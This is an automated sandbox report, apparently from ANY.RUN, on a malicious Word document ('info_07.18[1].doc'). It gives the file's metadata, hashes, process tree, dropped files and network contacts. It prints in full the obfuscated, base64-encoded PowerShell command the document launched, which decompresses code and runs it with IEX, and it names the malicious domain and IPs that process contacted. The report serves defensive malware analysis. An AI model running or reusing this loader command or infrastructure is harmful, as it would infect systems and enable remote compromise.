File name: | info_07.18[1].doc |
Full analysis: | https://app.any.run/tasks/9bc77df1-48ea-4b90-a2d1-29e7e8407890 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 14:37:42 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: lgxufvxoxwqkvfmfsdkklfadjj, Subject: xkpxxrebumr, Author: lggbpyjshcev, Comments: lnunk, Template: Normal, Last Saved By: Windows, Revision Number: 11, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Wed Jul 17 21:59:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | A3E1E2E62D1C512EF2A53958E11B2E48 |
SHA1: | 8BBA44F41A49CFF2680E0C330CE06F3883317B07 |
SHA256: | DC787E0DC5026FC1CE7A794C88F907F17B955D1690259DF5C96CA8DD99CFFA67 |
SSDEEP: | 1536:fuYOUnlg/reAtL6H6BCPP3zy5Di3sDS/KiG:f5g/rUuCPPDmS/KiG |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | lgxufvxoxwqkvfmfsdkklfadjj |
---|---|
Subject: | xkpxxrebumr |
Author: | lggbpyjshcev |
Keywords: | - |
Comments: | lnunk |
Template: | Normal |
LastModifiedBy: | Пользователь Windows |
RevisionNumber: | 11 |
Software: | Microsoft Office Word |
TotalEditTime: | 3.0 minutes |
CreateDate: | 2018:04:19 18:59:00 |
ModifyDate: | 2019:07:17 20:59:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Cyrillic |
Manager: | drsaayxqsqntpozxzydgsvps |
Company: | qusxmpzullgftkwnadizst |
Bytes: | 23552 |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3528 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\info_07.18[1].doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2408 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtACgAWwBzAHkAUwB0AGUAbQAuAEkATwAuAE0ARQBNAE8AcgBZAHMAdAByAGUAQQBtAF0AWwBzAFkAUwBUAGUATQAuAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAG8ATQBCAGEAcwBlADYANABzAHQAcgBpAG4ARwAoACcAVABaAEIAYgBhADgASgBBAEUASQBYAGYAQwAvADAAUAArADUAQwB5AEMAZABhAE4AYQBVAFcASgBJAFoAUgBpAHAASQBSAEsARgBDADkARQBlAGcASABYAE8ATABtADAATQBiAHQAawBWADUATQBZAC8ATwA5AE4AUQBXADEAZgBaAGwANwBPAG0AVABuAGYAVQBkAHoASwA1AGYAUgAxAGoAbQB5AEUAagAyAC8AagBvADcAUAB5AHMASwBVAHMAZQBjAEYAOQAzADEAWQBnAE8AdwB6ADIAQQBuAEsAZQBzAHoAQgBKAG8AWQBVAC8AYwBFAHMANQBPADEAcQBZAFEAQQBtAE4AbQBIAFYARABjADcAbQAxAGkAWQBvAHoAMwBNAEoAUQB0AEYAbQB6AE4AbAA4AFEAUwBLAHcAaABEADkAYQBMAE4AZgBGAGgAcwB4ADYATwBFAC8AQQBXAGwAbgBMAFkAegA1AHoASgA4ADMARgBvADQAMQBoAEsAUAB0AEQAMQBiAGQAawB4AHoARgBLAGsAQgBxAGMAQgBrAEwASQA2ADYAcQBJAHEAbQBCADUARwBqAEIAVwBFAHgALwB3AHAAdABZAFcAcwBJAEQAZABJAFYASwBhAFkAQwBKADQAbQBVAHMAVgAzAFcATABOAEMAbABnAE0ATgBZAGwAVgB4AHAAMwB6AFgAOQBSAEkAZgBKAFIAbQA2AFAAdABCAHEAbQBWAGYAMQBPAFIANQB4AFcATwBHAGwAagBEAHEAaABtADQANwArAEQAUABmAG8AegBLAHAAWgBiAG8AaABVAHQAWQBGADQAQQBkAGwAMgBHAHcASQBKAHoAZABnADEAQwBCAGMARgBTAFUAZgBlAGkANAB4AFIATwB3AEwAMABZAFAAYgA3AEcAcQByAGYAbgBZAFIARwBHAFIATQB5AEMAUQBTAFoANQBpAHcAQQBJAFQANABIAGcALwBtAEMAegBxAFIANgB2AGIAeABwAFUAbgA1AGIAcAAxAE4AQQBaAFIARABYAHAANQBPAEYAMwBOAEYASwAvAFIAYwBzAEcAMAArAG8ATQA1AGUANQBtADAAWABxAHAAUgBXAGoAWQB4AEwARAA3AEIARwBqADEAeQBWADkAVQAzAC8AOABiAFEASgByAG0AbgBWADcAOAB3AE0APQAnACkAIAAsAFsAcwBZAHMAVABlAG0ALgBpAG8ALgBjAE8ATQBwAFIAZQBTAHMAaQBPAE4ALgBDAG8AbQBwAHIAZQBzAHMASQBPAE4ATQBPAEQARQBdADoAOgBEAEUAQwBvAG0AcAByAGUAUwBTACAAKQB8ACYAKAAnAGYAJwArACcAbwByAGUAJwArACcAYQBjAEgAJwApAHsAIAAmACgAJwBOAEUAVwAtAG8AYgAnACsAJwBKACcAKwAnAEUAYwBUACcAKQAgACAAaQBgAG8ALgBgAFMAYABUAHIAZQBhAG0AUgBFAEEARABFAFIAKAAkAF8ALABbAHMAeQBTAFQAZQBtAC4AVABFAHgAVAAuAEUATgBjAG8AZABJAG4ARwBdADoAOgBhAHMAQwBpAGkAKQAgAH0AfAAuACgAJwBGAG8AcgBFAGEAJwArACcAQwAnACsAJwBIACcAKQB7ACQAXwAuAHIAZQBhAGQAdABvAGUAbgBkACgAKQAgAH0AIAApACAAfAAuACgAJwBJACcAKwAnAEUAJwAgACsAIAAnAFgAJwApAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD021.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GFIGGRYVTMIYSBQKFFUZ.temp | — | |
MD5:— | SHA256:— | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:DBF14BF3A6666774A1A8519421D6BB74 | SHA256:9D639BF335FDB4909FAF44536CEE078D733B6963C4624BA9ACA722524D3C327C | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:EE48BA32CA5F9229AEDA701B94678EE9 | SHA256:AE7B148EEB85BC373D3E03AD016CAED3706FB7E78230D49CFE923B8C1644DE92 | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:36FD9C4FA935EC196EAC6369B2B4CD0E | SHA256:BB4D67C346C66B3A6B4B910E117EAB53008C5607C5EF6D162114B26020712425 | |||
2408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF17e196.TMP | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
3528 | WINWORD.EXE | C:\Users\admin\Desktop\~$fo_07.18[1].doc | pgc | |
MD5:9A034BE61E701436DC406B3BBEB27557 | SHA256:B788FFDBD684709B9E0CDAE3D850885D46E1BFE4EB1B83975CD73557E3EAC391 | |||
2408 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB | SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95 | |||
3528 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\info_07.18[1].doc.LNK | lnk | |
MD5:5C8AD129C80D1557EA11CA251CEE1571 | SHA256:E89DE0B8575A357E4DD72F4A0B68988EF43DBFC80D70A9A928DDFA15E93CCCA3 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2408 | powershell.exe | 147.78.66.46:80 | dx019xsl1pace.xyz | — | — | suspicious |
2408 | powershell.exe | 109.196.164.79:80 | — | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
dx019xsl1pace.xyz |
| malicious |
dns.msftncsi.com |
| shared |